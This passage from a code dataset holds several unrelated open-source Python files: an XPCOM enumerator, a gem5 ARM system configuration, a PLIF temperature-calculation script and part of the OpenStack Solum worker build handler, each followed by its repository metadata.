text
stringlengths 4
1.02M
| meta
dict |
|---|---|
from xpcom import components
# This class is created by Python components when it
# needs to return an enumerator.
# For example, a component may implement a function:
# nsISimpleEnumerator enumSomething();
# This could could simply say:
# return SimpleEnumerator([something1, something2, something3])
class SimpleEnumerator:
_com_interfaces_ = [components.interfaces.nsISimpleEnumerator]
def __init__(self, data):
self._data = data
self._index = 0
def hasMoreElements(self):
return self._index < len(self._data)
def getNext(self):
self._index = self._index + 1
return self._data[self._index-1]
|
{
"content_hash": "ab1e43faedf641fb0490a966d8736efd",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 66,
"avg_line_length": 31.428571428571427,
"alnum_prop": 0.6893939393939394,
"repo_name": "dgomez10/xanon",
"id": "d3fb89a9d7573bf648b6a6086fc8240568a662b1",
"size": "2391",
"binary": false,
"copies": "31",
"ref": "refs/heads/master",
"path": "SDK/bindings/xpcom/python/xpcom/server/enumerator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "5767"
},
{
"name": "Assembly",
"bytes": "602"
},
{
"name": "C",
"bytes": "1834867"
},
{
"name": "C++",
"bytes": "6956615"
},
{
"name": "CSS",
"bytes": "704096"
},
{
"name": "Go",
"bytes": "228"
},
{
"name": "HTML",
"bytes": "5861682"
},
{
"name": "Haskell",
"bytes": "8060"
},
{
"name": "IDL",
"bytes": "84486"
},
{
"name": "Java",
"bytes": "113453"
},
{
"name": "JavaScript",
"bytes": "328606"
},
{
"name": "Makefile",
"bytes": "9270"
},
{
"name": "PHP",
"bytes": "2262806"
},
{
"name": "Perl",
"bytes": "422783"
},
{
"name": "Python",
"bytes": "5266626"
},
{
"name": "R",
"bytes": "3737"
},
{
"name": "SQLPL",
"bytes": "1764"
},
{
"name": "Shell",
"bytes": "45175"
},
{
"name": "Visual Basic",
"bytes": "3078"
}
],
"symlink_target": ""
}
|
from m5.params import *
from System import System
class ArmMachineType(Enum):
map = {'RealView_EB' : 827,
'RealView_PBX' : 1901,
'VExpress_ELT' : 2272,
'VExpress_CA9' : 2272,
'VExpress_EMM' : 2272,
'VExpress_EMM64' : 2272}
class ArmSystem(System):
type = 'ArmSystem'
cxx_header = "arch/arm/system.hh"
load_addr_mask = 0xffffffff
multi_proc = Param.Bool(True, "Multiprocessor system?")
boot_loader = Param.String("", "File that contains the boot loader code if any")
gic_cpu_addr = Param.Addr(0, "Addres of the GIC CPU interface")
flags_addr = Param.Addr(0, "Address of the flags register for MP booting")
have_security = Param.Bool(False,
"True if Security Extensions are implemented")
have_virtualization = Param.Bool(False,
"True if Virtualization Extensions are implemented")
have_lpae = Param.Bool(False, "True if LPAE is implemented")
have_generic_timer = Param.Bool(False,
"True if the Generic Timer extension is implemented")
highest_el_is_64 = Param.Bool(False,
"True if the register width of the highest implemented exception level "
"is 64 bits (ARMv8)")
reset_addr_64 = Param.Addr(0x0,
"Reset address if the highest implemented exception level is 64 bits "
"(ARMv8)")
phys_addr_range_64 = Param.UInt8(40,
"Supported physical address range in bits when using AArch64 (ARMv8)")
have_large_asid_64 = Param.Bool(False,
"True if ASID is 16 bits in AArch64 (ARMv8)")
class LinuxArmSystem(ArmSystem):
type = 'LinuxArmSystem'
cxx_header = "arch/arm/linux/system.hh"
load_addr_mask = 0x0fffffff
machine_type = Param.ArmMachineType('RealView_PBX',
"Machine id from http://www.arm.linux.org.uk/developer/machines/")
atags_addr = Param.Addr("Address where default atags structure should " \
"be written")
boot_release_addr = Param.Addr(0xfff8, "Address where secondary CPUs " \
"spin waiting boot in the loader")
dtb_filename = Param.String("",
"File that contains the Device Tree Blob. Don't use DTB if empty.")
early_kernel_symbols = Param.Bool(False,
"enable early kernel symbol tables before MMU")
enable_context_switch_stats_dump = Param.Bool(False, "enable stats/task info dumping at context switch boundaries")
panic_on_panic = Param.Bool(False, "Trigger a gem5 panic if the " \
"guest kernel panics")
panic_on_oops = Param.Bool(False, "Trigger a gem5 panic if the " \
"guest kernel oopses")
|
{
"content_hash": "75c190498127e76c7b860cdc49ae5503",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 119,
"avg_line_length": 46.62068965517241,
"alnum_prop": 0.6372041420118343,
"repo_name": "wnoc-drexel/gem5-stable",
"id": "a803a251b226ca3d655d8339cc7ff0253977886b",
"size": "4808",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "src/arch/arm/ArmSystem.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Assembly",
"bytes": "239800"
},
{
"name": "C",
"bytes": "957228"
},
{
"name": "C++",
"bytes": "13915041"
},
{
"name": "CSS",
"bytes": "9813"
},
{
"name": "Emacs Lisp",
"bytes": "1969"
},
{
"name": "Groff",
"bytes": "11130043"
},
{
"name": "HTML",
"bytes": "132838214"
},
{
"name": "Java",
"bytes": "3096"
},
{
"name": "Makefile",
"bytes": "20709"
},
{
"name": "PHP",
"bytes": "10107"
},
{
"name": "Perl",
"bytes": "36183"
},
{
"name": "Protocol Buffer",
"bytes": "3246"
},
{
"name": "Python",
"bytes": "3739380"
},
{
"name": "Shell",
"bytes": "49333"
},
{
"name": "Visual Basic",
"bytes": "2884"
}
],
"symlink_target": ""
}
|
"""
PLIF Temperature Calculator
Created on Wed Feb 3 16:51:48 2016
@author: Darren Banks
plif_temperature calculates temperature in a plane of rhodamine-B solution
based on the intensity at which the rhodamine fluoresces under planar laser
irradiation. plif_temperature requires the module plif_tools to run.
"""
import logging
import matplotlib.pyplot as plt
import numpy as np
from os import makedirs
from os.path import exists
import plif_tools as pt
import sys
""" Logging setup """
logger = logging.getLogger('plif')
logger.setLevel(logging.DEBUG)
con_format = '%(asctime)s - %(name)s - %(levelname)-8s: %(message)s'
console_format = logging.Formatter(con_format, datefmt='%H:%M:%S')
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.DEBUG)
console_handler.setFormatter(console_format)
logger.addHandler(console_handler)
""" Create console handler. """
log_file = 'C:\\Users\\Darren\\Documents\\GitHub\\PLIFluorescence\\debug.log'
if not exists(log_file):
file = open(log_file, 'a')
file.close()
log_format = '%(asctime)s %(name)-24s %(levelname)-8s %(message)s'
logfile_format = logging.Formatter(log_format, datefmt='%Y-%m-%d %H:%M:%S')
file_handler = logging.FileHandler(log_file)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(logfile_format)
logger.addHandler(file_handler)
""" Create debug logging file handler. """
info_file = 'C:\\Users\\Darren\\Documents\\GitHub\\PLIFluorescence\\info.log'
if not exists(info_file):
file = open(info_file, 'a')
file.close()
info_handler = logging.FileHandler(info_file, mode='w')
info_handler.setLevel(logging.INFO)
info_handler.setFormatter(logfile_format)
logger.addHandler(info_handler)
""" Creating info logging file handler. """
logger.debug('Starting.')
plt.ioff
""" Suppressing graph output to the iPython console. """
""" Literals """
num_reference_images = 100
""" Number of frames to establish base fluorescence within images. """
grid_number = 40
""" Number of grid cells applied to the images for analysis. """
want_plots = False
""" If want_plots is False, the temperature surface plots will
not be produced. Generally a time-saving value if False.
"""
plot_path = 'figures 2'
""" The folder name that will contain temperatures plots. """
plot_type = '.png'
""" Image file extension for saving results. """
results = 'temperatures 2.xlsx'
""" Name of MS Excel file to save results. """
statistics = 'statistics 2.xlsx'
""" Name of MS Excel file to save summarizing statistics. """
plot_width = 4
""" The base width in inches for output plots. """
plt.rc('font', family='serif', size=24.0, serif='Times New Roman')
""" Set the default font for plotting to Times New Roman, so it
matches that used in the paper.
"""
""" Image import """
root_directory = ('I:\\PLIF\\test 11\\images 2 - Copy')
if not exists(root_directory):
logger.error('Experiment directory does not exist!')
sys.exit()
logger.info('Directory: ' + root_directory)
""" Directory containing experiment images and calibration. """
figure_path = root_directory + '\\' + plot_path
""" Directory for result figures to be saved. """
if not exists(figure_path):
makedirs(figure_path)
[image_path, calib_paths] = pt.exptDirectory(root_directory, '', 'cal')
all_images = pt.listImages(image_path)
all_averages = pt.gridAverage(all_images, grid_number)
reference_averages = all_averages[:num_reference_images]
image_averages = all_averages[num_reference_images:]
logger.debug('First {} images used as reference'.format(num_reference_images))
""" Take the RGB mean value for the images in each grid square. """
aspect_ratio = pt.getAspectRatio(all_images[0])
logger.info('File import complete')
""" Calibration of intensity to temperature """
mean_reference_averages = np.mean(reference_averages)
""" Take the average of each grid square over the collection of
calibration images.
"""
calib_temperatures = [path[-2:] for path in calib_paths]
calib_image_sets = [pt.listImages(path) for path in calib_paths]
""" Gather the images located in the calibration directories. """
calib_averages = pt.getCalibrationAverages(calib_image_sets,
calib_temperatures, grid_number)
""" Apply grid and get RGB averages for each calibration temperature. """
grid_slopes = pt.getGridSlopes(calib_averages, calib_temperatures)
logger.info('Temperature calibration complete.')
""" Calculating temperature """
delta_intensity = image_averages - mean_reference_averages
delta_temperature = delta_intensity / grid_slopes
delta_temperature.to_excel(image_path+'\\temperature_deltas.xlsx')
plot_temperatures = delta_intensity / grid_slopes + int(calib_temperatures[0])
""" Calculate the temperature based on the difference between the
calibration and the image's grid RGB averages.
"""
if min(plot_temperatures.min()) < 25:
logger.warn('Subcooled, possibly erroneous temperatures')
plot_temperatures.to_excel(image_path + '\\' + results)
""" Save the calculated temperatures for analysis. """
""" Reporting the temperature statistics. """
stats_list = pt.getTemperatureStats(plot_temperatures, image_path, statistics)
pt.plotTemperatureStats(stats_list, image_path, plot_type)
""" Plotting temperature contour in each video frame. """
if want_plots:
z_minimum = 25
z_maximum = 100
""" User sets the graph maximum and minimum temperature values. """
plot_range = np.arange(grid_number)
x_grid, y_grid = np.meshgrid(plot_range, plot_range)
""" Setting up the X and Y array for plotting purposes. """
temperature_intervals = np.arange(z_minimum, z_maximum, 1)
""" The temperature range to scale the color map. """
fig = plt.figure(figsize=(2.5*plot_width, 2.0*plot_width/aspect_ratio))
for index, row in plot_temperatures.iterrows():
frame_title = 'Frame {}'.format(index-99)
""" Title of each plot corresponds to its frame number in video. """
plot_temperature_array = np.reshape(row, (grid_number, grid_number))
""" plotTemperatureArray is the calculated temperature for a
3-D surface plot. It takes the row of the temperature
dataFrame and fits it to the x- and y-grid set on the
image during analysis.
"""
plt.contourf(x_grid, y_grid, plot_temperature_array,
temperature_intervals, cmap='jet', extend='both',
vmin=z_minimum, vmax=z_maximum)
plt.title(frame_title)
plt.xticks(np.arange(0, grid_number, 1))
plt.yticks(np.arange(0, grid_number, 1))
plt.colorbar()
plt.grid(color='k', linestyle='solid', which='both')
""" Creating and formatting the plot with a colormap, the
previously set Z limits, ticks with intervals of 1,
and a black grid.
"""
""" Save the figure within a subfolder of the initial
directory, and then clear the figure.
"""
plt.savefig(figure_path + '\\' + frame_title + plot_type, dpi=50)
plt.clf()
if np.mod(index-99, 100) == 0:
logger.debug('Frame {} graphed'.format(index-99))
""" Iterating over the frames. """
plt.close('all')
if not want_plots:
logger.info('Temperatures not plotted.')
logger.info('Complete\n')
|
{
"content_hash": "7ab5fc09f3c38eaf082b48ddc97de6ec",
"timestamp": "",
"source": "github",
"line_count": 240,
"max_line_length": 78,
"avg_line_length": 30.820833333333333,
"alnum_prop": 0.6897390834121941,
"repo_name": "darren6337/PLIFluorescence",
"id": "52e65cc3f4e9b642a9c4ffc265485950dbd0dedb",
"size": "7421",
"binary": false,
"copies": "1",
"ref": "refs/heads/PLIF-20160227",
"path": "plif_temperature.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "23154"
}
],
"symlink_target": ""
}
|
"""Solum Worker shell handler."""
import ast
import base64
import json
import os
import random
import shelve
import string
import subprocess
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import uuidutils
from sqlalchemy import exc as sqla_exc
import solum
from solum.common import clients
from solum.common import exception
from solum.common import repo_utils
from solum.conductor import api as conductor_api
from solum.deployer import api as deployer_api
from solum.i18n import _
from solum import objects
from solum.objects import assembly
from solum.objects import image
from solum.privileged import rootwrap as priv_rootwrap
import solum.uploaders.local as local_uploader
import solum.uploaders.swift as swift_uploader
LOG = logging.getLogger(__name__)
ASSEMBLY_STATES = assembly.States
IMAGE_STATES = image.States
cfg.CONF.import_opt('task_log_dir', 'solum.worker.config', group='worker')
cfg.CONF.import_opt('proj_dir', 'solum.worker.config', group='worker')
cfg.CONF.import_opt('param_file_path', 'solum.worker.config', group='worker')
cfg.CONF.import_opt('log_upload_strategy', 'solum.worker.config',
group='worker')
cfg.CONF.import_opt('image_storage', 'solum.worker.config', group='worker')
cfg.CONF.import_opt('temp_url_secret', 'solum.worker.config', group='worker')
cfg.CONF.import_opt('temp_url_protocol', 'solum.worker.config', group='worker')
cfg.CONF.import_opt('temp_url_ttl', 'solum.worker.config', group='worker')
def upload_task_log(ctxt, original_path, resource, build_id, stage):
strategy = cfg.CONF.worker.log_upload_strategy
LOG.debug("User log upload strategy: %s" % strategy)
uploader = {
'local': local_uploader.LocalStorage,
'swift': swift_uploader.SwiftUpload,
}.get(strategy, local_uploader.LocalStorage)
uploader(ctxt, original_path, resource, build_id, stage).upload_log()
def job_update_notification(ctxt, build_id, status=None, description=None,
created_image_id=None, docker_image_name=None,
assembly_id=None):
"""send a status update to the conductor."""
LOG.debug('build id:%s %s (%s) %s %s %s' % (build_id, status, description,
created_image_id,
docker_image_name,
assembly_id),
context=solum.TLS.trace)
conductor_api.API(context=ctxt).build_job_update(build_id, status,
description,
created_image_id,
docker_image_name,
assembly_id)
def get_assembly_by_id(ctxt, assembly_id):
return solum.objects.registry.Assembly.get_by_id(ctxt, assembly_id)
def get_image_by_id(ctxt, image_id):
return solum.objects.registry.Image.get_by_id(ctxt, image_id)
def get_app_by_assem_id(ctxt, assembly_id):
assem = get_assembly_by_id(ctxt, assembly_id)
if assem:
plan = solum.objects.registry.Plan.get_by_id(ctxt, assem.plan_id)
app = solum.objects.registry.App.get_by_id(ctxt, plan.uuid)
return app
def get_parameter_by_assem_id(ctxt, assembly_id):
assem = get_assembly_by_id(ctxt, assembly_id)
param_obj = solum.objects.registry.Parameter.get_by_plan_id(ctxt,
assem.plan_id)
if not param_obj:
plan = solum.objects.registry.Plan.get_by_id(ctxt, assem.plan_id)
app = solum.objects.registry.App.get_by_id(ctxt, plan.uuid)
app = json.loads(app.raw_content)
param_obj = app.get('parameters', {})
return param_obj
def update_assembly_status(ctxt, assembly_id, status):
if assembly_id is None:
return
LOG.debug('Updating assembly %s status to %s' % (assembly_id, status))
data = {'status': status}
conductor_api.API(context=ctxt).update_assembly(assembly_id, data)
try:
update_wf_and_app_status(ctxt, assembly_id, status)
except Exception as e:
LOG.exception(e)
def update_wf_and_app_status(ctxt, assembly_id, status):
# Update workflow and app objects
status_data = dict()
status_data['status'] = status
try:
wf = objects.registry.Workflow.get_by_assembly_id(assembly_id)
objects.registry.Workflow.update_and_save(ctxt, wf.id, status_data)
except sqla_exc.SQLAlchemyError as ex:
LOG.error("Failed to update workflow corresponding to assembly %s"
% assembly_id)
LOG.exception(ex)
if wf is not None:
try:
app = objects.registry.App.get_by_id(ctxt, wf.app_id)
objects.registry.App.update_and_save(ctxt, app.id, status_data)
except sqla_exc.SQLAlchemyError as ex:
LOG.error("Failed to update app status and app URL: %s" % app.id)
LOG.exception(ex)
def update_lp_status(ctxt, image_id, name, status, external_ref=None,
docker_image_name=None):
if image_id is None:
return
LOG.debug('Updating languagepack %s status to %s and external_ref to %s'
% (name, status, external_ref))
conductor_api.API(context=ctxt).update_image(image_id, status,
external_ref,
docker_image_name)
def get_lp_access_method(lp_project_id):
if lp_project_id == cfg.CONF.api.operator_project_id:
return 'operator'
else:
return 'custom'
class Handler(object):
def echo(self, ctxt, message):
LOG.debug("%s" % message)
@exception.wrap_keystone_exception
def get_du_details(self, ctxt, du_id):
du_loc = None
du_name = None
du_image_backend = cfg.CONF.worker.image_storage
if du_image_backend.lower() == 'glance':
img = clients.OpenStackClients(ctxt).glance().images.get(du_id)
du_loc = img.id
du_name = img.name
elif du_image_backend.lower() == 'swift':
raise exception.NotImplemented()
else:
LOG.error("Invalid image storage option.")
raise exception.ResourceNotFound()
return du_loc, du_name
@exception.wrap_keystone_exception
def _get_environment(self, ctxt, git_info, assembly_id=None,
test_cmd=None, run_cmd=None, lp_access=None):
source_uri = git_info['source_url']
# create a minimal environment
user_env = {}
private = git_info.get('private', False)
ssh_key = git_info.get('private_ssh_key', '')
if private and ssh_key:
user_env['REPO_DEPLOY_KEYS'] = ssh_key
for var in ['PATH', 'LOGNAME', 'LANG', 'HOME', 'USER', 'TERM']:
if var in os.environ:
user_env[var] = os.environ[var]
if assembly_id is not None:
assem = get_assembly_by_id(ctxt, assembly_id)
user_env['ASSEMBLY_ID'] = str(assem.uuid)
else:
str_assem = (''.join(random.choice(string.ascii_uppercase)
for i in range(20)))
user_env['ASSEMBLY_ID'] = str_assem
user_env['IMAGE_STORAGE'] = cfg.CONF.worker.image_storage
user_env['DELETE_LOCAL_CACHE'] = cfg.CONF.worker.delete_local_cache
if cfg.CONF.worker.image_storage == 'docker_registry':
if cfg.CONF.worker.docker_reg_endpoint is None:
LOG.debug("DU upload set to docker registry,")
LOG.debug("but docker registry endpoint is not set.")
LOG.debug("Setting it to 127.0.0.1")
cfg.CONF.worker.docker_reg_endpoint = '127.0.0.1'
user_env['DOCKER_REGISTRY'] = cfg.CONF.worker.docker_reg_endpoint
else:
client_region_name = clients.get_client_option('swift',
'region_name')
user_env['OS_AUTH_TOKEN'] = ctxt.auth_token
user_env['OS_AUTH_URL'] = ctxt.auth_url or ''
user_env['OS_REGION_NAME'] = client_region_name
kc = clients.OpenStackClients(ctxt).keystone()
user_env['OS_IMAGE_URL'] = kc.client.service_catalog.url_for(
service_type='image',
interface='publicURL')
user_env['OS_STORAGE_URL'] = kc.client.service_catalog.url_for(
service_type='object-store',
interface='publicURL',
region_name=client_region_name)
user_env['TEMP_URL_SECRET'] = cfg.CONF.worker.temp_url_secret
user_env['TEMP_URL_PROTOCOL'] = cfg.CONF.worker.temp_url_protocol
user_env['TEMP_URL_TTL'] = cfg.CONF.worker.temp_url_ttl
user_env['OPR_LP_DOWNLOAD_STRATEGY'] = (
cfg.CONF.worker.operator_lp_download_strategy)
# Get LP Operator context for downloading operator LPs
lp_kc = clients.OpenStackClients(None).keystone().lp_admin_client
# Get the auth ref from session
auth_ref = lp_kc.session.auth.get_auth_ref(lp_kc.session)
# Get service_catalog
service_catalog = auth_ref.service_catalog
user_env['OPER_AUTH_TOKEN'] = lp_kc.session.get_token()
user_env['OPER_OS_STORAGE_URL'] = service_catalog.url_for(
service_type='object-store',
interface='publicURL',
region_name=client_region_name)
if test_cmd is not None:
user_env['TEST_CMD'] = test_cmd
if run_cmd is not None:
user_env['RUN_CMD'] = run_cmd
user_env['PROJECT_ID'] = ctxt.project_id
user_env['BUILD_ID'] = uuidutils.generate_uuid()
user_env['SOLUM_TASK_DIR'] = cfg.CONF.worker.task_log_dir
if lp_access is not None:
user_env['ACCESS'] = lp_access
params_env = self._get_parameter_env(ctxt, source_uri, assembly_id,
user_env['BUILD_ID'])
user_env.update(params_env)
return user_env
@property
def proj_dir(self):
if cfg.CONF.worker.proj_dir:
return cfg.CONF.worker.proj_dir
return os.path.abspath(os.path.join(os.path.dirname(__file__),
'..', '..', '..'))
def _get_build_command(self, ctxt, stage, source_uri, name,
base_image_id, source_format, image_format,
commit_sha, artifact_type=None, lp_image_tag=None):
# map the input formats to script paths.
# TODO(asalkeld) we need an "auto".
pathm = {'heroku': 'lp-cedarish',
'dib': 'diskimage-builder',
'dockerfile': 'lp-dockerfile',
'chef': 'lp-chef',
'docker': 'docker',
'qcow2': 'docker',
'vm': 'docker'}
if base_image_id == 'auto' and image_format == 'qcow2':
base_image_id = 'cedarish'
build_app_path = os.path.join(self.proj_dir, 'contrib',
pathm.get(source_format, 'lp-cedarish'),
pathm.get(image_format, 'docker'))
if artifact_type == 'language_pack':
build_lp = os.path.join(build_app_path, 'build-lp')
return [build_lp, source_uri, name, ctxt.project_id]
if stage == 'unittest':
build_app = os.path.join(build_app_path, 'unittest-app')
return [build_app, source_uri, commit_sha, ctxt.project_id,
base_image_id, lp_image_tag]
elif stage == 'build':
build_app = os.path.join(build_app_path, 'build-app')
return [build_app, source_uri, commit_sha, name, ctxt.project_id,
base_image_id, lp_image_tag]
def _get_parameter_env(self, ctxt, source_uri, assembly_id, build_id):
param_env = {}
if assembly_id is None:
return param_env
param_obj = get_parameter_by_assem_id(ctxt, assembly_id)
if param_obj is None:
return param_env
user_param_file = '/'.join([cfg.CONF.worker.param_file_path,
build_id, 'user_params'])
solum_param_file = '/'.join([cfg.CONF.worker.param_file_path,
build_id, 'solum_params'])
try:
os.makedirs(os.path.dirname(user_param_file), 0o700)
except OSError as ex:
LOG.error("Error creating dirs to write out param files, %s" % ex)
return param_env
def _sanitize_param(s):
if s is None:
return ''
elif isinstance(s, str):
# Handles the case of exporting a var with a multi-line string
return ''.join(['"', s.strip('\n').replace('"', '\\"'), '"'])
else:
return str(s)
with open(user_param_file, 'w') as f:
f.write("#!/bin/bash\n")
if param_obj.get('user_params'):
for k, v in param_obj['user_params'].items():
if k and k.startswith('_SYSTEM'):
# Variables for control purpose, e.g. _SYSTEM_USE_DRONE
param_env[k] = _sanitize_param(v)
else:
f.write("export %s=%s\n" % (k, _sanitize_param(v)))
with open(solum_param_file, 'w') as f:
f.write("#!/bin/bash\n")
if param_obj.get('solum_params'):
for k, v in param_obj['solum_params'].items():
if k == 'REPO_DEPLOY_KEYS':
# Pass in deploy key as an environment variable
param_env[k] = self._get_private_key(v, source_uri)
f.write("export %s=%s\n" % (k, _sanitize_param(v)))
param_env['USER_PARAMS'] = user_param_file
param_env['SOLUM_PARAMS'] = solum_param_file
return param_env
def launch_workflow(self, ctxt, build_id, git_info, ports, name,
base_image_id, source_format, image_format,
assembly_id, workflow, test_cmd, run_cmd, du_id):
if 'unittest' in workflow:
if self._do_unittest(ctxt, build_id, git_info, name, base_image_id,
source_format, image_format, assembly_id,
test_cmd) != 0:
return
du_image_loc = None
du_image_name = None
if 'build' in workflow:
du_image_loc, du_image_name = self._do_build(
ctxt, build_id, git_info, name, base_image_id, source_format,
image_format, assembly_id, run_cmd)
if 'deploy' in workflow:
if du_id:
du_image_loc, du_image_name = self.get_du_details(ctxt, du_id)
if du_image_loc and du_image_name:
self._do_deploy(ctxt, assembly_id, ports, du_image_loc,
du_image_name)
else:
LOG.warning("Deploy called without DU details. "
"Cannot continue.")
return
if 'scale' in workflow:
self._do_scale(ctxt, assembly_id)
def build(self, ctxt, build_id, git_info, name, base_image_id,
source_format, image_format, assembly_id, run_cmd):
self._do_build(ctxt, build_id, git_info, name, base_image_id,
source_format, image_format, assembly_id, run_cmd)
def unittest(self, ctxt, build_id, git_info, name, base_image_id,
source_format, image_format, assembly_id, test_cmd):
self._do_unittest(ctxt, build_id, git_info, name, base_image_id,
source_format, image_format, assembly_id, test_cmd)
def _do_deploy(self, ctxt, assembly_id, ports, du_image_loc,
du_image_name):
app = get_app_by_assem_id(ctxt, assembly_id)
LOG.debug("Deploying app %s %s" % (app.name, app.id))
deployer_api.API(context=ctxt).deploy(assembly_id=assembly_id,
image_loc=du_image_loc,
image_name=du_image_name,
ports=ports)
def _do_scale(self, ctxt, assembly_id):
app = get_app_by_assem_id(ctxt, assembly_id)
LOG.debug("Scaling app %s %s" % (app.name, app.id))
deployer_api.API(context=ctxt).scale(assembly_id=assembly_id)
def _do_build(self, ctxt, build_id, git_info, name, base_image_id,
source_format, image_format, assembly_id, run_cmd):
update_assembly_status(ctxt, assembly_id, ASSEMBLY_STATES.BUILDING)
app = get_app_by_assem_id(ctxt, assembly_id)
LOG.debug("Building app %s %s" % (app.name, app.id))
solum.TLS.trace.clear()
solum.TLS.trace.import_context(ctxt)
source_uri = git_info['source_url']
commit_sha = git_info.get('commit_sha', '')
private = git_info.get('private', False)
ssh_key = git_info.get('private_ssh_key', '')
# If the repo is private, make sure private ssh key is provided
if private and not ssh_key:
LOG.warning("Error building due to missing private ssh key."
" assembly ID: %s" % assembly_id)
job_update_notification(ctxt, build_id, IMAGE_STATES.ERROR,
description='private ssh key missing',
assembly_id=assembly_id)
update_assembly_status(ctxt, assembly_id,
ASSEMBLY_STATES.ERROR)
return
image_tag = ''
lp_access = ''
if base_image_id != 'auto':
image = objects.registry.Image.get_lp_by_name_or_uuid(
ctxt, base_image_id, include_operators_lp=True)
if (not image or not image.project_id or not image.status or
not image.external_ref or not image.docker_image_name or
image.status.lower() != 'ready'):
LOG.warning("Error building due to language pack not ready."
" assembly ID: %s" % assembly_id)
job_update_notification(ctxt, build_id, IMAGE_STATES.ERROR,
description='language pack not ready',
assembly_id=assembly_id)
update_assembly_status(ctxt, assembly_id,
ASSEMBLY_STATES.ERROR)
return
base_image_id = image.external_ref
image_tag = image.docker_image_name
lp_access = get_lp_access_method(image.project_id)
build_cmd = self._get_build_command(ctxt, 'build', source_uri,
name, base_image_id,
source_format, image_format,
commit_sha,
lp_image_tag=image_tag)
solum.TLS.trace.support_info(build_cmd=' '.join(build_cmd),
assembly_id=assembly_id)
user_env = {}
try:
user_env = self._get_environment(ctxt,
git_info,
assembly_id=assembly_id,
run_cmd=run_cmd,
lp_access=lp_access)
except exception.SolumException as env_ex:
LOG.exception(env_ex)
job_update_notification(ctxt, build_id, IMAGE_STATES.ERROR,
description=str(env_ex),
assembly_id=assembly_id)
log_env = user_env.copy()
if 'OS_AUTH_TOKEN' in log_env:
del log_env['OS_AUTH_TOKEN']
if 'OPER_AUTH_TOKEN' in log_env:
del log_env['OPER_AUTH_TOKEN']
if 'OPER_OS_STORAGE_URL' in log_env:
del log_env['OPER_OS_STORAGE_URL']
solum.TLS.trace.support_info(environment=log_env)
job_update_notification(ctxt, build_id, IMAGE_STATES.BUILDING,
description='Starting the image build',
assembly_id=assembly_id)
# TODO(datsun180b): Associate log with assembly properly
logpath = "%s/%s-%s.log" % (user_env['SOLUM_TASK_DIR'],
'build',
user_env['BUILD_ID'])
LOG.debug("Build logs for app %s stored at %s" % (app.name, logpath))
out = None
assem = None
if assembly_id is not None:
assem = get_assembly_by_id(ctxt, assembly_id)
if assem.status == ASSEMBLY_STATES.DELETING:
return
try:
out = subprocess.Popen(build_cmd,
env=user_env,
stdout=subprocess.PIPE).communicate()[0]
except (OSError, ValueError) as subex:
LOG.exception(subex)
job_update_notification(ctxt, build_id, IMAGE_STATES.ERROR,
description=str(subex),
assembly_id=assembly_id)
update_assembly_status(ctxt, assembly_id, ASSEMBLY_STATES.ERROR)
return
if assem is not None:
assem.type = 'app'
wf = objects.registry.Workflow.get_by_assembly_id(assem.id)
upload_task_log(ctxt, logpath, assem, wf.id, 'build')
'''
we expect two lines in the output that looks like:
created_image_id=<location of DU>
docker_image_name=<DU name>
The DU location is:
DU's swift tempUrl if backend is 'swift';
DU's UUID in glance if backend is 'glance';
DU's docker registry location if backend is 'docker_registry'
'''
du_image_loc = None
docker_image_name = None
for line in out.split('\n'):
# Won't break out until we get the final
# matching which is the expected value
if line.startswith('created_image_id'):
solum.TLS.trace.support_info(build_out_line=line)
du_image_loc = line.replace('created_image_id=', '').strip()
elif line.startswith('docker_image_name'):
docker_image_name = line.replace('docker_image_name=', '')
if not du_image_loc or not docker_image_name:
job_update_notification(ctxt, build_id, IMAGE_STATES.ERROR,
description='image not created',
assembly_id=assembly_id)
update_assembly_status(ctxt, assembly_id, ASSEMBLY_STATES.ERROR)
return
else:
job_update_notification(ctxt, build_id, IMAGE_STATES.READY,
description='built successfully',
created_image_id=du_image_loc,
docker_image_name=docker_image_name,
assembly_id=assembly_id)
update_assembly_status(ctxt, assembly_id, ASSEMBLY_STATES.BUILT)
return (du_image_loc, docker_image_name)
def _do_unittest(self, ctxt, build_id, git_info, name, base_image_id,
source_format, image_format, assembly_id, test_cmd):
if test_cmd is None:
LOG.debug("Unit test command is None; skipping unittests.")
return 0
app = get_app_by_assem_id(ctxt, assembly_id)
LOG.debug("Unit testing for app %s %s" % (app.name, app.id))
commit_sha = git_info.get('commit_sha', '')
status_url = git_info.get('status_url')
repo_token = git_info.get('repo_token')
update_assembly_status(ctxt, assembly_id, ASSEMBLY_STATES.UNIT_TESTING)
image_tag = ''
lp_access = ''
if base_image_id != 'auto':
image = objects.registry.Image.get_lp_by_name_or_uuid(
ctxt, base_image_id, include_operators_lp=True)
if (not image or not image.project_id or not image.status or
not image.external_ref or not image.docker_image_name or
image.status.lower() != 'ready'):
LOG.warning("Error running unittest due to language pack"
" not ready. assembly ID: %s" % assembly_id)
update_assembly_status(ctxt, assembly_id,
ASSEMBLY_STATES.ERROR)
return
base_image_id = image.external_ref
image_tag = image.docker_image_name
lp_access = get_lp_access_method(image.project_id)
git_url = git_info['source_url']
command = self._get_build_command(ctxt, 'unittest', git_url, name,
base_image_id,
source_format, image_format,
commit_sha, lp_image_tag=image_tag)
solum.TLS.trace.clear()
solum.TLS.trace.import_context(ctxt)
user_env = self._get_environment(ctxt,
git_info,
assembly_id=assembly_id,
test_cmd=test_cmd,
lp_access=lp_access)
log_env = user_env.copy()
if 'OS_AUTH_TOKEN' in log_env:
del log_env['OS_AUTH_TOKEN']
if 'OPER_AUTH_TOKEN' in log_env:
del log_env['OPER_AUTH_TOKEN']
if 'OPER_OS_STORAGE_URL' in log_env:
del log_env['OPER_OS_STORAGE_URL']
solum.TLS.trace.support_info(environment=log_env)
logpath = "%s/%s-%s.log" % (user_env['SOLUM_TASK_DIR'],
'unittest',
user_env['BUILD_ID'])
LOG.debug("Unittest logs stored at %s" % logpath)
returncode = -1
assem = None
if assembly_id is not None:
assem = get_assembly_by_id(ctxt, assembly_id)
if assem.status == ASSEMBLY_STATES.DELETING:
return returncode
try:
runtest = subprocess.Popen(command, env=user_env,
stdout=subprocess.PIPE)
returncode = runtest.wait()
except OSError as subex:
